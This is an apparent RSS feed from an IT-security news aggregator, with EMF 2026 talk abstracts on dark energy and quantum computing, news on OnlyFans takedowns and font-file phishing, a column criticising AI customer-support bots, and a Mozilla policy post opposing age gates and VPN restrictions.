<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Astronomical observations show that our universe is expanding faster and faster in all directions due to something we call ‘dark energy’ – but what exactly is it? There are many theories out there, and astrophysicists have an unlikely ally in the search – atomic physicists like myself. As part of my PhD research, I used lasers to trap and cool atoms to use as tiny sensors to search for new physics, including searching for evidence of a specific dark energy candidate, the chameleon field. In this talk I will give an overview of the physics behind dark energy and my experiment, explain how atomic physics experiments have applications across all sorts of fields, and why even though I ended up measuring zero, that’s still moving science forward. 

Note: no actual chameleons were harmed in the making of this talk.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/246-killing-the-astrophysical-chameleon]]></content:encoded>
</item>
<item>
<title><![CDATA[What does a quantum computer actually do? (emf2026)]]></title>
<description><![CDATA[Inside a trapped-ion quantum computer, what really happens when you run a program?

This talk follows a single calculation end-to-end. From ions being loaded and cooled in a trap, through a sequence of laser pulses that implement quantum gates, to the final measurement that produces a result. Alo...]]></description>
<link>https://tsecurity.de/de/3678023/it-security-video/what-does-a-quantum-computer-actually-do-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678023/it-security-video/what-does-a-quantum-computer-actually-do-emf2026/</guid>
<pubDate>Sat, 18 Jul 2026 15:03:09 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Inside a trapped-ion quantum computer, what really happens when you run a program?

This talk follows a single calculation end-to-end. From ions being loaded and cooled in a trap, through a sequence of laser pulses that implement quantum gates, to the final measurement that produces a result. Along the way, we’ll unpack how qubits are physically realised in atomic states, and how carefully controlled interactions between light and atoms are used to answer the question we asked.

Rather than treating the system as a black box or leaning on analogies, we’ll connect each step directly to what is happening in the hardware. The aim is to demystify the stack and build a concrete picture of how a trapped-ion quantum computer actually runs a calculation in practice.

This talk grew out of my own attempt to understand the physics after joining a quantum computing startup as an electronic engineer with limited prior exposure to the field. It’s an effort to turn a vague, abstract topic into something tangible, by walking through it from beginning to end.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/42-what-does-a-quantum-computer-actually-do]]></content:encoded>
</item>
<item>
<title><![CDATA[What does a quantum computer actually do? (emf2026)]]></title>
<description><![CDATA[Inside a trapped-ion quantum computer, what really happens when you run a program?

This talk follows a single calculation end-to-end. From ions being loaded and cooled in a trap, through a sequence of laser pulses that implement quantum gates, to the final measurement that produces a result. Alo...]]></description>
<link>https://tsecurity.de/de/3677947/it-security-video/what-does-a-quantum-computer-actually-do-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677947/it-security-video/what-does-a-quantum-computer-actually-do-emf2026/</guid>
<pubDate>Sat, 18 Jul 2026 14:03:26 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Inside a trapped-ion quantum computer, what really happens when you run a program?

This talk follows a single calculation end-to-end. From ions being loaded and cooled in a trap, through a sequence of laser pulses that implement quantum gates, to the final measurement that produces a result. Along the way, we’ll unpack how qubits are physically realised in atomic states, and how carefully controlled interactions between light and atoms are used to answer the question we asked.

Rather than treating the system as a black box or leaning on analogies, we’ll connect each step directly to what is happening in the hardware. The aim is to demystify the stack and build a concrete picture of how a trapped-ion quantum computer actually runs a calculation in practice.

This talk grew out of my own attempt to understand the physics after joining a quantum computing startup as an electronic engineer with limited prior exposure to the field. It’s an effort to turn a vague, abstract topic into something tangible, by walking through it from beginning to end.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/42-what-does-a-quantum-computer-actually-do]]></content:encoded>
</item>
<item>
<title><![CDATA[OnlyFans performers become unlikely allies of CISOs in securing websites]]></title>
<description><![CDATA[CISOs at government organizations and universities have an unexpected ally coming to their aid: OnlyFans models.



For some time, hackers have exploited weaknesses in the websites of universities or government departments to host scams or malware, using content stolen from the OnlyFans website a...]]></description>
<link>https://tsecurity.de/de/3676773/it-nachrichten/onlyfans-performers-become-unlikely-allies-of-cisos-in-securing-websites/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676773/it-nachrichten/onlyfans-performers-become-unlikely-allies-of-cisos-in-securing-websites/</guid>
<pubDate>Fri, 17 Jul 2026 20:03:02 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">CISOs at government organizations and universities have an unexpected ally coming to their aid: OnlyFans models.</p>



<p class="wp-block-paragraph">For some time, hackers have exploited weaknesses in the websites of universities or government departments to host scams or malware, using content stolen from the OnlyFans website as bait to attract victims.</p>



<p class="wp-block-paragraph">Now, according to security researchers at Upguard, <a href="https://www.upguard.com/breaches/adult-supervision-how-onlyfans-takedowns-quietly-police-compromised-domains" target="_blank" rel="noreferrer noopener">the fightback has begun</a>: creators of adult content on OnlyFans are leveraging Google search results and the protection offered by copyright law to break up the traffic distribution systems created by bad actors.</p>



<p class="wp-block-paragraph">These distribution systems work in three stages: entry points using adult or other content to attract and capture web traffic, a routing system sends it to destination sites, and those sites monetize the traffic through scams and malware. It has proved to be a lucrative business for the scammers.</p>



<p class="wp-block-paragraph">Google recognizes the approach and calls such actors SEO parasites as they benefit from the reputations of other organizations — in particular government or academic sites, which Google views as having high authority.</p>



<p class="wp-block-paragraph">Since the creators of OnlyFans content are also the copyright holders, they are able to issue Digital Millennium Copyright Act (DMCA) take-down notices for the stolen content posted by the bad actors to other sites. Upguard was able to track this through <a href="https://transparencyreport.google.com/copyright/overview" target="_blank" rel="noreferrer noopener">Google’s DMCA Transparency Report</a>, and through the <a href="https://lumendatabase.org/" target="_blank" rel="noreferrer noopener">Lumen Database</a>, another tracker of takedown notices, to which it was granted research access.</p>



<p class="wp-block-paragraph">“This allows us to identify likely compromised sites: government and university domains advertising unlicensed adult content,” Upguard said.</p>



<p class="wp-block-paragraph">The OnlyFans creators’ action has two benefits for the operators of the affected websites: The adult content associated with their domain disappears from Google search results, no longer affecting their reputation — and if they receive takedown notices for such content they can check their webservers for the vulnerabilities that enabled the bad actors to post it there in the first place.</p>



<p class="wp-block-paragraph"><em>This article first appeared on <a href="https://www.csoonline.com/article/4198478/onlyfans-performers-become-unlikely-allies-of-cisos-in-securing-websites.html">CSO</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[OnlyFans performers become unlikely allies of CISOs in securing websites]]></title>
<description><![CDATA[CISOs at government organizations and universities have an unexpected ally coming to their aid: OnlyFans models.



For some time, hackers have exploited weaknesses in the websites of universities or government departments to host scams or malware, using content stolen from the OnlyFans website a...]]></description>
<link>https://tsecurity.de/de/3676724/it-security-nachrichten/onlyfans-performers-become-unlikely-allies-of-cisos-in-securing-websites/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676724/it-security-nachrichten/onlyfans-performers-become-unlikely-allies-of-cisos-in-securing-websites/</guid>
<pubDate>Fri, 17 Jul 2026 19:38:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">CISOs at government organizations and universities have an unexpected ally coming to their aid: OnlyFans models.</p>



<p class="wp-block-paragraph">For some time, hackers have exploited weaknesses in the websites of universities or government departments to host scams or malware, using content stolen from the OnlyFans website as bait to attract victims.</p>



<p class="wp-block-paragraph">Now, according to security researchers at Upguard, <a href="https://www.upguard.com/breaches/adult-supervision-how-onlyfans-takedowns-quietly-police-compromised-domains" target="_blank" rel="noreferrer noopener">the fightback has begun</a>: creators of adult content on OnlyFans are leveraging Google search results and the protection offered by copyright law to break up the traffic distribution systems created by bad actors.</p>



<p class="wp-block-paragraph">These distribution systems work in three stages: entry points using adult or other content to attract and capture web traffic, a routing system sends it to destination sites, and those sites monetize the traffic through scams and malware. It has proved to be a lucrative business for the scammers.</p>



<p class="wp-block-paragraph">Google recognizes the approach and calls such actors SEO parasites as they benefit from the reputations of other organizations — in particular government or academic sites, which Google views as having high authority.</p>



<p class="wp-block-paragraph">Since the creators of OnlyFans content are also the copyright holders, they are able to issue Digital Millennium Copyright Act (DMCA) take-down notices for the stolen content posted by the bad actors to other sites. Upguard was able to track this through <a href="https://transparencyreport.google.com/copyright/overview" target="_blank" rel="noreferrer noopener">Google’s DMCA Transparency Report</a>, and through the <a href="https://lumendatabase.org/" target="_blank" rel="noreferrer noopener">Lumen Database</a>, another tracker of takedown notices, to which it was granted research access.</p>



<p class="wp-block-paragraph">“This allows us to identify likely compromised sites: government and university domains advertising unlicensed adult content,” Upguard said.</p>



<p class="wp-block-paragraph">The OnlyFans creators’ action has two benefits for the operators of the affected websites: The adult content associated with their domain disappears from Google search results, no longer affecting their reputation — and if they receive takedown notices for such content they can check their webservers for the vulnerabilities that enabled the bad actors to post it there in the first place.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[“TTF Trap” Phishing Emails Use Fake Font Files to Deliver Windows Malware]]></title>
<description><![CDATA[An email that appears to contain a shipping document, payment request, or business proposal can infect a Windows… This article has been indexed from Hackread – Cybersecurity News, Data Breaches, AI and More Read the original article: “TTF Trap” Phishing…
Read more →
The post “TTF Trap” Phishing E...]]></description>
<link>https://tsecurity.de/de/3676392/it-security-nachrichten/ttf-trap-phishing-emails-use-fake-font-files-to-deliver-windows-malware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676392/it-security-nachrichten/ttf-trap-phishing-emails-use-fake-font-files-to-deliver-windows-malware/</guid>
<pubDate>Fri, 17 Jul 2026 17:10:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>An email that appears to contain a shipping document, payment request, or business proposal can infect a Windows… This article has been indexed from Hackread – Cybersecurity News, Data Breaches, AI and More Read the original article: “TTF Trap” Phishing…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/ttf-trap-phishing-emails-use-fake-font-files-to-deliver-windows-malware/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/ttf-trap-phishing-emails-use-fake-font-files-to-deliver-windows-malware/">“TTF Trap” Phishing Emails Use Fake Font Files to Deliver Windows Malware</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[“TTF Trap” Phishing Emails Use Fake Font Files to Deliver Windows Malware]]></title>
<description><![CDATA[An email that appears to contain a shipping document, payment request, or business proposal can infect a Windows…]]></description>
<link>https://tsecurity.de/de/3676244/it-security-nachrichten/ttf-trap-phishing-emails-use-fake-font-files-to-deliver-windows-malware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676244/it-security-nachrichten/ttf-trap-phishing-emails-use-fake-font-files-to-deliver-windows-malware/</guid>
<pubDate>Fri, 17 Jul 2026 15:53:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[An email that appears to contain a shipping document, payment request, or business proposal can infect a Windows…]]></content:encoded>
</item>
<item>
<title><![CDATA[Linkdump 29/2026]]></title>
<description><![CDATA[Viel Spass bei den von mir als lesenswert empfundenen Links auf Artikel, die ich in der vergangenen Woche gelesen habe.

Interesting for everyone who wants to start a newsletter as well. How I Built My Own Newsletter Setup (And Why).

From Metrics to Meaning, don't forget to step back and see the...]]></description>
<link>https://tsecurity.de/de/3675919/it-nachrichten/linkdump-292026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675919/it-nachrichten/linkdump-292026/</guid>
<pubDate>Fri, 17 Jul 2026 13:48:36 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Viel Spass bei den von mir als lesenswert empfundenen Links auf Artikel, die ich in der vergangenen Woche gelesen habe.<br>
<br>
Interesting for everyone who wants to start a newsletter as well. <a href="https://endler.dev/2026/newsletter-setup/">How I Built My Own Newsletter Setup (And Why)</a>.<br>
<br>
<a href="https://mikefisher.substack.com/p/from-metrics-to-meaning">From Metrics to Meaning</a>, don't forget to step back and see the whole picture.<br>
<br>
Interesting insight from the "new" CEO,  <a href="https://bitwarden.com/blog/my-first-100-days-at-bitwarden/">My first 100 days at Bitwarden</a>.<br>
<br>
<a href="https://projekte-leicht-gemacht.de/blog/projektmanagement-praxis/abstimmungen-als-zeitfresser-im-projekt/">Warum „kurz abstimmen“ im Projekt so viel Zeit frisst</a> – oh, ja, wie wahr.<br>
<br>
You can be busy without even doing something, <a href="https://nesslabs.com/newsletter/busyness-trap">The Busyness Trap</a>.<br>
<br>
<a href="https://www.scotthyoung.com/blog/2026/04/23/motivate-yourself-to-do-anything/">How to Motivate Yourself to Do Anything</a>, yes, good catches.<br>]]></content:encoded>
</item>
<item>
<title><![CDATA[It’s past time to end AI-based automated customer responses]]></title>
<description><![CDATA[An automated chatbot working for Anthropic this month shot down a Wiz researcher’s security hole report, saying that it “falls outside of the Claude Code threat model.” That was news to the security researchers at Wiz. 



It also turned out to be news to Anthropic execs, who had a very different...]]></description>
<link>https://tsecurity.de/de/3675876/it-nachrichten/its-past-time-to-end-ai-based-automated-customer-responses/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675876/it-nachrichten/its-past-time-to-end-ai-based-automated-customer-responses/</guid>
<pubDate>Fri, 17 Jul 2026 13:18:16 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">An automated chatbot working for Anthropic this month shot down a Wiz researcher’s security hole report, saying that it “falls outside of the Claude Code threat model.” That was news to the security researchers at <a href="https://www.wiz.io/" target="_blank" rel="noreferrer noopener">Wiz</a>. </p>



<p class="wp-block-paragraph">It also turned out to be news to Anthropic execs, who had a very different view. </p>



<p class="wp-block-paragraph">In reality, Anthropic was one of many victims of the hole — <a href="https://www.csoonline.com/article/4195235/ai-coding-tool-hole-illustrates-a-big-problem-with-human-in-the-loop.html" target="_blank">including Amazon, Google and Cursor, among others</a>. But what makes the incident so bizarre is that, far from dismissing the threat, Anthropic had detected it before the security researchers and had even patched it before the researchers alerted them. </p>



<p class="wp-block-paragraph">As these AI bots are wont to do, the bot didn’t merely reject the request. It confidently explained its rationale, even though its reasoning was wrong. </p>



<p class="wp-block-paragraph">“This falls outside our current threat model,” the chatbot said, <a href="https://www.wiz.io/blog/ghostapproval-a-trust-boundary-gap-in-ai-coding-assistants" target="_blank" rel="noreferrer noopener">according to a report by Wiz</a>. “When the user first starts Claude Code in a directory, they must confirm that they trust the directory prior to starting the session. The scenario you describe involves a user explicitly confirming a permission prompt inside of a directory containing a malicious symlink, which falls outside of the Claude Code threat model.”</p>



<p class="wp-block-paragraph">That researchers said Anthropic management later clarified the situation: “The symlink warning in the Edit/Write permission dialog shipped in v2.1.32 (Feb 5, 2026), nine days before this report was submitted to us. It was added as part of proactive security hardening based on internal review. The decline to comment was an autoreply from our triage system.” </p>



<p class="wp-block-paragraph">An autoreply from our triage system? How many other make-believe replies did this system send? And what level of damage is Anthropic exposing itself to? </p>



<p class="wp-block-paragraph">This is not just an Anthropic issue. There have been numerous enterprise bot glitches in communications  with customers. Some of my favorites include:</p>



<ul class="wp-block-list">
<li>Bots that chose on their own to cancel customers. (This actually was another Anthropic incident.) In this case, <a href="https://www.computerworld.com/article/4108169/using-ai-to-automatically-cancel-customers-not-a-smart-move.html">an Anthropic bot cancelled the AI account of a Swiss company</a> that depended on the service. A lawyer got involved and the account was restored within a day — minus 80% of the data. Oops.</li>



<li>A Cursor bot decided to log customers off when they switched devices, which it shouldn’t have done. The bot then emailed customers and lied that, “The logouts were expected behavior under a new login policy.” <a href="https://www.yahoo.com/news/customer-support-ai-went-rogue-120000474.html">A Fortune story</a> detailed how “the news spread rapidly in the developer community, leading to reports of users cancelling their subscriptions, while some complained about the lack of transparency. Cofounder Michael Truell finally posted on Reddit acknowledging the ‘incorrect response from a front-line AI support bot’ and said it was investigating a bug that logged users out. ‘Apologies about the confusion here,’ he wrote.”</li>



<li>Voters in Scottish elections were<a href="https://www.theguardian.com/technology/2026/may/20/ai-chatbots-chatgpt-replika-grok-gemini-misinformation-scottish-election-demos" target="_blank" rel="noreferrer noopener"> tricked by government AI bots</a> that “variously invented fictitious scandals, gave the wrong date for the election, claimed wrongly that voters in Scottish elections needed ID at polling stations and placed candidates in the wrong contests.”</li>



<li>And let’s not forge <a href="https://cybermaniacs.com/news/air-canada-chatbot-case-when-ai-speaks-for-the-company#:~:text=As%2520The%2520Guardian%2520reported%252C%2520the%2520tribunal%2520found,information%2520about%2520the%2520airline's%2520bereavement%2520fare%2520policy" target="_blank" rel="noreferrer noopener">the classic story about the Air Canada bot</a>, where “Air Canada was ordered to compensate a customer after its chatbot gave incorrect information about the airline’s bereavement fare policy. The tribunal found that Air Canada was responsible for information provided through its website, including the chatbot.”</li>
</ul>



<p class="wp-block-paragraph">Let’s be clear, here: Bots should be limited to relaying only pre-approved scripts. </p>



<p class="wp-block-paragraph">Generative AI allows for far greater chatbot sophistication, but that also means the chance of far greater errors. This is untenable in any business function. And when the app is pretending to be a human — and interacting with human customers — it’s even more unacceptable.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mozilla Privacy Blog: Beyond technical fixes: Protecting kids online without breaking the internet]]></title>
<description><![CDATA[This is part one of a two-part series in which we explore approaches to protecting children online while safeguarding privacy, security and the open web. Part one covers our concerns regarding age gates, and alternative policy proposals that address the root causes of online harms. 
Young people ...]]></description>
<link>https://tsecurity.de/de/3675858/tools/mozilla-privacy-blog-beyond-technical-fixes-protecting-kids-online-without-breaking-the-internet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675858/tools/mozilla-privacy-blog-beyond-technical-fixes-protecting-kids-online-without-breaking-the-internet/</guid>
<pubDate>Fri, 17 Jul 2026 13:10:44 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><i>This is part one of a two-part series in which we explore approaches to protecting children online while safeguarding privacy, security and the open web. Part one covers our concerns regarding age gates, and alternative policy proposals that address the root causes of online harms. </i></p>
<p>Young people today have unprecedented opportunities to learn, connect, and explore — not just the web and the world, but also themselves. With the increased ubiquity of digital technologies and devices, worries around the <a href="https://www.nature.com/articles/s41562-018-0506-1">relationship between these technologies and young people’s well-being</a> have grown, too. While concerns about the societal implications of new technologies is <a href="https://journals.sagepub.com/doi/10.1177/1745691620919372">not a new phenomenon</a>, <a href="https://www.science.org/doi/10.1126/science.adt6807">experts argue</a> that the accelerating speed of deployment of new technologies has outpaced scientists’ capacity to feed into policy recommendations addressing risks. A growing body of research <a href="https://osf.io/preprints/psyarxiv/m38u6_v2">documents</a> the harms experienced by young people online and the challenges <a href="https://ijse.padovauniversitypress.it/2024/1/8">reported</a> by parents attempting to mediate their kids’ technology use. At the same time, experts highlight the importance of contextual factors like <a href="https://www.nature.com/articles/s41562-025-02134-4">existing mental health conditions</a>, <a href="https://onlinelibrary.wiley.com/doi/full/10.1002/jad.12193">socio-economic circumstances</a> and <a href="https://www.sciencedirect.com/science/article/pii/S0747563224000244">parental mediation</a> to understand the real-world effects of digital technologies.</p>
<p>Faced with this complexity, and mounting public pressure, policymakers around the world are urgently seeking ways to improve child safety online. Driven by a sense of time running out and promises of new <a href="https://www.schneier.com/blog/archives/2026/05/laurie-anderson-is-quoting-me.html">technical solutions</a> to difficult questions, this has led, <a href="https://avpassociation.com/map/">across jurisdictions</a>, to proposals to restrict young people’s access to certain technologies or platforms by introducing age assurance mandates.</p>
<p>Privacy and user empowerment have always formed a core part of Mozilla’s mission. As <a href="https://blog.mozilla.org/netpolicy/2025/12/19/australias-social-media-ban-why-age-limits-wont-fix-what-is-wrong-with-online-platforms/">we have said before</a>, we support safer spaces for minors, but we caution against approaches that rely on identity checks, surveillance-based enforcement, or exclusionary defaults. Such interventions rely on the collection of personal and sensitive data and, thus, introduce major new privacy and security risks.</p>
<p>While many technologies exist to verify, estimate, or infer users’ ages, fundamental tensions around accessibility, their effectiveness and effects on user’s privacy, security and free expression <a href="https://kgi.georgetown.edu/wp-content/uploads/2026/01/Age_Assurance_Online_Technical-Assessment_Report_KGI.pdf">remain</a>. Technological approaches must be part of wider efforts to address the root causes of online harms. However, the deployment of age assurance technologies will not solve the complex challenge of preparing young people to navigate an increasingly online world and ensure their wellbeing. That will require more holistic approaches: offering education and support to navigate the web safely, addressing harmful business practices and acknowledging the offline factors shaping children’s lives including social inequality, poverty or disparate access to (mental) health care services.</p>
<p><em><b>Ineffective age-gating mandates and the dangerous shift toward VPN restrictions</b></em></p>
<p>As jurisdictions around the world gain experience with government-mandated age gates for certain services, evidence is mounting that age restrictions are not an effective policy tool. Avoiding age gates is widespread and trivially easy: In Australia, where minors under 16 year of age have been banned from certain social media platforms since December 2025, the government’s Compliance Update <a href="https://www.esafety.gov.au/sites/default/files/2026-03/SocialMediaMinimumAgeComplianceUpdateMarch2026.pdf?v=1775600939713">reports</a> that seven out of ten young Australians remain online, often skirting age checks by simply entering a fake birthdate. A recent <a href="https://www.internetmatters.org/wp-content/uploads/2026/04/Internet-Matters-Online-Safety-Act-Report-May-2026.pdf">study</a> on the implementation of the UK’s Online Safety Act found that a third of children have bypassed age gates with fairly trivial steps like faking their birthdate, borrowing someone else’s login credentials, or even drawing on facial hair, and that a quarter of parents have helped their children to bypass age assurance systems. In the US, <a href="https://www.ftc.gov/sites/default/files/documents/public_comments/massachusetts-00243%C2%A0/00243-82161.pdf">studies</a> indicate that as far back as 2011, 64% of parents who were aware their child under 13 had a social media account were also ones who helped them create that account.</p>
<p>Confronted with the apparent ineffectiveness of age gates, policymakers around the world seem to be shifting their attention to alleged circumvention tools. While <a href="https://www.internetmatters.org/wp-content/uploads/2026/04/Internet-Matters-Online-Safety-Act-Report-May-2026.pdf">research</a> shows that many young people bypass age barriers by using other people’s devices and accounts or tricking age estimation tools by making themselves look older, virtual private networks (VPNs) are <a href="https://www.europarl.europa.eu/RegData/etudes/ATAG/2026/782618/EPRS_ATA(2026)782618_EN.pdf">increasingly</a> <a href="https://www.bbc.com/news/articles/cn438z3ejxyo">framed</a> as primarily a “loophole” to age gates. VPNs create encrypted “tunnels” between a user’s device and the internet, protecting all internet traffic from that device and concealing users’ IP addresses. VPNs are an essential privacy and security resource for millions of users worldwide, <a href="https://home.crin.org/the-big-debates/vpns-for-children">including young people</a>.</p>
<p><a href="https://www.eff.org/deeplinks/2026/04/utahs-new-law-regulating-vpns-goes-effect-next-week">Utah’s recent age verification law</a> holds websites hosting age-restricted content liable for verifying the age of anyone physically located in Utah, including individuals using VPNs or proxies. While the law does not ban VPNs outright, it forces websites to either block known VPN IP addresses or verify the age of every visitor globally. In the UK, policymakers <a href="https://www.bbc.com/news/articles/c9824zvpz9po">debated</a> <a href="https://www.bbc.com/news/articles/cn438z3ejxyo">age gates</a> for VPNs extensively, but <a href="https://www.bbc.com/news/articles/c982857nlrlo">stopped short</a> of restricting VPNs after <a href="https://www.gov.uk/government/publications/childrens-circumvention-behaviours-online?utm_medium=email&amp;utm_campaign=govuk-notifications-topic&amp;utm_source=97439257-1368-42dd-835e-2ecc1f690097&amp;utm_content=immediately">new evidence</a> <a href="https://vpntrust.net/2026/07/08/new-yougov-research-finds-vpns-are-not-widely-used-by-children-to-avoid-age-checks/?msg_pos=1">confirmed</a> that VPNs are not a relevant pathway for children seeking to bypass age checks. In Brazil, the ECA Digital law <a href="https://www.planalto.gov.br/ccivil_03/_ato2023-2026/2026/decreto/d12880.htm">empowers</a> the regulatory authority to order technical countermeasures against circumvention tools such as VPNs. These developments suggest a worrying trend: well-meaning but ineffective attempts to protect children risk undermining the fundamental rights to privacy, security, and free expression of all users, as well as the health and openness of the web itself.</p>
<p>We are convinced, however, that there are rights-respecting alternatives policymakers can pursue to empower young people online and improve their safety and well-being.</p>
<p><em><strong>Moving beyond access bans</strong></em></p>
<p>We strongly believe that online safety frameworks should be grounded in <a href="https://www.unicef.org/innovation/stories/protecting-childrens-rights-in-digital-environments">children’s rights</a>, striking a balance between their right to protection and their right to participate in society, express themselves freely, and access media and information. Such frameworks must also be proportionate and should not undermine the fundamental rights and access to tools like VPNs for all users.</p>
<p>Rather than focusing on limiting access, we believe that policymakers should prioritize interventions that tackle the root causes of online harm. Before considering new instruments, this work starts with ensuring that independent regulatory authorities have the necessary resources to enforce existing online safety frameworks. In Europe, preliminary findings against <a href="https://ec.europa.eu/commission/presscorner/detail/en/ip_26_1579">Meta</a> and <a href="https://digital-strategy.ec.europa.eu/en/news/commission-preliminarily-finds-tiktoks-addictive-design-breach-digital-services-act">TikTok</a> find these companies’ addictive design features to be in breach of the Digital Services Act, underlining the potential of frameworks like the DSA to address key concerns.</p>
<p>The design of online interfaces, and the affordances and constraints they offer, significantly influences users’ interactions, decisions and overall wellbeing. ‘Dark patterns’ or deceptive interfaces are key drivers of harms experienced by users, and especially young people: they can compel people to consent to extensive data collection and processing, resulting in hyper-personalized feeds, personalized ads that may exploit cognitive vulnerabilities and promote unhealthy or excessive consumer choices, and an overall erosion of privacy.</p>
<p>This is why we support proposals like <a href="https://blog.mozilla.org/netpolicy/2025/10/31/pathways-to-a-fairer-digital-world-mozilla-shares-views-on-the-eu-digital-fairness-act/">EU Digital Fairness Act (DFA) </a>and the <a href="https://blog.mozilla.org/netpolicy/2026/06/11/a-handful-of-companies-control-the-web-aicoa-can-change-that/">American Innovation and Choice Online Act (AICOA)</a> that could fill regulatory gaps. Specifically, we advocate for the <b>prohibition of harmful design</b>, guided by harmonized definitions of core concepts like “dark patterns”, “deceptive design,” and “addictive design” and anti-circumvention clauses to prevent companies from avoiding regulation through small tweaks. Platforms should be responsible for demonstrating that their design choices are fair, non-manipulative and non-exploitative. And services that are likely to be accessed by children should be required to refrain from enabling certain design features, including excessive notifications, endless feeds and gambling-like features by default, and only with parental consent.</p>
<p>Further, we urge policymakers to adopt a <b>privacy-first approach to online harms</b>. Many of the risks encountered by young people online are related to the collection and processing of personal data. Platforms collect enormous amounts of personal data, including sensitive data, to personalize and target services, ranging from algorithmic recommender systems to online ads. While the systems that target and display ads and curate online content are distinct, both are based on the surveillance and profiling of users.</p>
<p>Such profiling is the basis for young people being targeted with personalized ads and content recommendations, which can segment, exclude, or steer people into inequitable options and towards harmful content. Providers should thus be prohibited from using sensitive personal data (e.g. ethnicity, religious belief, health status, sexual orientation, political affiliation) to personalize content recommendations or ads, and they should be mandated to enable privacy-protective settings by default, including restricting access to users’ location, camera, microphone, contacts, and camera roll. Policymakers should also extend the fairness and transparency obligations to personalization systems and advertising actors, including intermediaries and data brokers.</p>
<p>Additionally, everyone online, including families and young people, should be fully in control of their online experiences and navigate the web according to their preferences and needs. There is a significant opportunity to <b>empower users with easy, effective opt-out rights and granular user controls</b>. In practice, users should have the right to opt out of personalized content and targeting without being penalized with a downgraded version of the service. Some frameworks already strengthen choice – in those cases, we advocate for their robust enforcement.</p>
<p>Across jurisdictions, choice can be strengthened by ensuring that preferences explicitly expressed (e.g. settings selected, feedback signals, customization choices made, survey responses) are respected and “sticky”, so do not get reset without being explicitly requested by the user. Interoperability mandates should let people integrate third-party content moderation systems or recommendation algorithms that better match their preferences and help them break out of the walled gardens of a few dominant companies. Parental controls are another important lever to operationalize user controls: Providers should deploy easy-to-use and effective parental controls that allow families to tailor online experiences to their preferences, across platforms.</p>
<p>We appreciate that this is a long list of complex policy recommendations which are also impacted by broader (geo)political developments. The fact remains that current age assurance approaches are not a silver bullet, and will create more, rather than solve, problems in the long term.</p>
<p>Where policymakers consider age signals as necessary to ensure age-appropriate online experiences, we believe that there are technical approaches better suited to balance users’ rights than those currently pursued. We will explore these developments and approaches in the second part of this series.</p>
<p>The post <a href="https://blog.mozilla.org/netpolicy/2026/07/17/beyond-technical-fixes-protecting-kids-online-without-breaking-the-internet/">Beyond technical fixes: Protecting kids online without breaking the internet </a> appeared first on <a href="https://blog.mozilla.org/netpolicy">Open Policy &amp; Advocacy</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How to add XLAs to your outsourcing contract]]></title>
<description><![CDATA[Organizations usually face the same questions concerning XLAs: What should we measure, who owns the data, how should incentives work, and how will this change provider behavior after signature.



There are no easy answers either, but after advising clients in MSP relationships with major provide...]]></description>
<link>https://tsecurity.de/de/3675704/it-nachrichten/how-to-add-xlas-to-your-outsourcing-contract/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675704/it-nachrichten/how-to-add-xlas-to-your-outsourcing-contract/</guid>
<pubDate>Fri, 17 Jul 2026 12:17:06 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
